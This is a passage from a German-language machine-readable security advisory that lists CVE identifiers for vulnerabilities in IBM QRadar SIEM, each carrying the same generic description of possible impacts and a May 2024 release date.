unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3609" }, { "cve": "CVE-2023-3611", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3611" }, { "cve": "CVE-2023-3772", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3772" }, { "cve": "CVE-2023-3812", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3812" }, { "cve": "CVE-2023-38546", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-38546" }, { "cve": "CVE-2023-40283", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-40283" }, { "cve": "CVE-2023-4128", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4128" }, { "cve": "CVE-2023-4132", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4132" }, { "cve": "CVE-2023-4155", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4155" }, { "cve": "CVE-2023-4206", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4206" }, { "cve": "CVE-2023-4207", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4207" }, { "cve": "CVE-2023-4208", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4208" }, { "cve": "CVE-2023-42753", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-42753" }, { "cve": "CVE-2023-45862", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-45862" }, { "cve": "CVE-2023-45871", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-45871" }, { "cve": "CVE-2023-46218", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-46218" }, { "cve": "CVE-2023-4622", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4622" }, { "cve": "CVE-2023-4623", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4623" }, { "cve": "CVE-2023-46813", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-46813" }, { "cve": "CVE-2023-4732", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4732" }, { "cve": "CVE-2023-4921", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-4921" }, { "cve": "CVE-2023-50387", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-50387" }, { "cve": "CVE-2023-50868", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-50868" }, { "cve": "CVE-2023-51042", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-51042" }, { "cve": "CVE-2023-51043", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-51043" }, { "cve": "CVE-2023-5178", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-5178" }, { "cve": "CVE-2023-52425", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-52425" }, { "cve": "CVE-2023-5633", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-5633" }, { "cve": "CVE-2023-5717", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-5717" }, { "cve": 